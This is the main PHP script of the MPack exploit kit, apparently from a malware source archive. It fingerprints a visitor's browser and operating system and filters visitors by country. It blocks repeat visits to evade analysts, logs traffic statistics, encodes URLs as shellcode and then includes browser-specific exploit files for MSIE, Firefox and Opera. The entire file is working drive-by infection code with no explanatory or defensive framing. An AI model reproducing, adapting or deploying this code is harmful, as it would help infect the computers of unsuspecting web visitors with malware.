MalwareSourceCode/PHP/HackTool.PHP.Mphak.e
2020-10-09 22:05:41 -05:00

236 lines
6.4 KiB
Plaintext

<?
// MPack main script
// .CONFIG
include ('settings.php'); //global settings
// .CODE
include ('cryptor.php'); //crypting module
function detect_browser($HTTP_USER_AGENT) {
// Áðàóçåð è åãî âåðñèÿ
if (eregi("(opera) ([0-9]{1,2}.[0-9]{1,3}){0,1}", $HTTP_USER_AGENT, $match) || eregi("(opera/)([0-9]{1,2}.[0-9]{1,3}){0,1}", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Opera";
$browser[version] = $match[2];
}
elseif (eregi("(konqueror)/([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Konqueror";
$browser[version] = $match[2];
}
elseif (eregi("(lynx)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Lynx";
$browser[version] = $match[2];
}
elseif (eregi("(links) \(([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Links";
$browser[version] = $match[2];
}
elseif (eregi("(msie) ([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "MSIE";
$browser[version] = $match[2];
}
elseif (eregi("(netscape6)/(6.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Netscape";
$browser[version] = $match[2];
}
elseif (eregi("(mozilla)/([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Netscape(mozilla)";
$browser[version] = $match[2];
if (eregi("(firefox)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Firefox";
$browser[version] = $match[2];}
}
else {
$browser[name] = "Unknown";
$browser[version] = "Unknown";
}
// OS
if (eregi("linux", $HTTP_USER_AGENT)) $browser[os] = "Linux";
elseif (eregi("win32", $HTTP_USER_AGENT)) $browser[os] = "Windows";
elseif ((eregi("(win)([0-9]{2})", $HTTP_USER_AGENT, $match)) || (eregi("(windows) ([0-9]{2})", $HTTP_USER_AGENT, $match))) $browser[os] = "Windows ".$match[2];
elseif (eregi("(winnt)([0-9]{1,2}.[0-9]{1,2}){0,1}", $HTTP_USER_AGENT, $match)) $browser[os] = "Windows NT ".$match[2];
elseif (eregi("(windows nt)( ){0,1}([0-9]{1,2}.[0-9]{1,2}){0,1}", $HTTP_USER_AGENT, $match)) $browser[os] = "Windows NT ".$match[3];
elseif (eregi("mac", $HTTP_USER_AGENT)) $browser[os] = "Macintosh";
elseif (eregi("freebsd", $HTTP_USER_AGENT)) $browser[os] = "FreeBSD";
else $browser[os] = "Unknown";
if (eregi("(sv1)", $HTTP_USER_AGENT)) $browser[os] = "Windows NT 5.1 SP2";
return $browser;
}
function uEncode($s) //encodes url into shellcode
{
$res=strtoupper(bin2hex($s));
$g = round(strlen($res)/4);
if ($g != (strlen($res)/4)) { $res.="00"; }
$out = "";
for ($i=0; $i<strlen($res); $i+=4) {
$out.="%u".substr($res, $i+2, 2).substr($res, $i, 2);
}
return $out;
}
//checks current country with a list
//terminate if not in the list
function CheckCountry()
{
global $CoutryList;
$cci=GetCountryInfo(getenv("REMOTE_ADDR"));
if (strpos(strtoupper($CoutryList), $cci['a2'])==FALSE) {
//coutry not in the list
echo "^_^";
exit;
}
}
//checks and saves user's IP hashed with browser
//to avoid future browser's hangup
function CheckAddUser()
{
global $UseMySQL;
global $dbstats;
$ipua=md5(getenv("REMOTE_ADDR").getenv("HTTP_USER_AGENT"));
if ($UseMySQL==0) {
//text variant
$fn="users.txt";
if (file_exists($fn)) {
$lines = file($fn);
if (in_array($ipua."\n", $lines)==TRUE) {
//got dup
echo ";[";
exit;
}
}
//uniq record
$fp=fopen($fn,"a");
fwrite($fp,$ipua."\n");
fclose($fp);
} else {
//mysql variant
$query = "SELECT * FROM ".$dbstats."_users WHERE data='".$ipua."'";
$res=mysql_query($query);
$merr=mysql_error();
if ($merr!="") {
//looks like no table, create & add data
$query="CREATE TABLE `".$dbstats."_users` (`data` VARCHAR( 32 ) NOT NULL ) ENGINE = MYISAM ;";
mysql_query($query);
$query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
mysql_query($query);
} else {
//table found, check returned set count
$rcount=@mysql_num_rows($res);
if ($rcount>0) {
//found data, prevent view
echo ":[";
exit;
} else {
//not found, add
$query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
mysql_query($query);
}
}
}
}
// Windows NT 5.0 = Win2000
// Windows NT 5.1 = WinXP sp0,1
// Windows NT 5.1 SP2 = WinXP sp2 (Windows NT 5.1; SV1) under IE
// Windows NT 5.2 = Win2003 build 164/16.6
$browser = detect_browser(getenv("HTTP_USER_AGENT"));
if ($OnlyDefiniedCoutries==1) { CheckCountry(); }
if ($BlockDuplicates==1) { CheckAddUser(); }
AddIP("all");
if ($UseMySQL==1) { //geo2ip stat on traff
$id="traff";
$cci=GetCountryInfo(getenv("REMOTE_ADDR"));
//increase hits to this country
$query = "UPDATE ".$dbstats." SET count = count + 1 WHERE a2 = '".$cci['a2']."' AND statid = '".$id."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats." VALUES ('".$id."', '".$cci['a2']."', '".$cci['name']."', 1)";
mysql_query($query);
}
//browser-type count
$query = "UPDATE ".$dbstats."_brs SET count = count + 1 WHERE browser = '".$browser[name]."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats."_brs VALUES ('".$browser[name]."', 1)";
mysql_query($query);
}
}
if ($CountReferers==1) { //referer count
$ref="_".substr(@mysql_real_escape_string(getenv("HTTP_REFERER")),0,100);
$query = "UPDATE ".$dbstats."_refs SET count = count + 1 WHERE referer = '".$ref."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats."_refs VALUES ('".$ref."', 1)";
mysql_query($query);
}
}
//extended loader's subsystem
if (isset($_GET['id'])) {
$LoaderPath=$LoaderPath."?id=".$_GET['id'];
}
//exploits combination
if ($browser[name]=="MSIE") {
if ($browser[os]!="Windows NT 5.0") { AddIP("0day"); include 'crypt.php'; include 'megapack1.php'; }
if ($browser[os]=="Windows NT 5.0") { AddIP("jar"); include 'ms06-044_w2k.php'; include 'megapack1.php'; }
}
if ($browser[name]=="Firefox") { AddIP("firefox"); include 'ff.php'; }
if ($browser[name]=="Opera") {
if (substr($browser[version], 0, 1)<"8") { AddIP("opera7"); include 'o7.php'; }
}
//if ($browser[name]!="Opera") && ($browser[name]!="Firefox") && ($browser[name]!="MSIE") { include 'megapack1.php'; }
//echo getenv("HTTP_USER_AGENT")."<br>";
//echo "Browser: ".$browser[name]."<br> Browser Ver: ".$browser[version]."<br>OS: ".$browser[os];
?>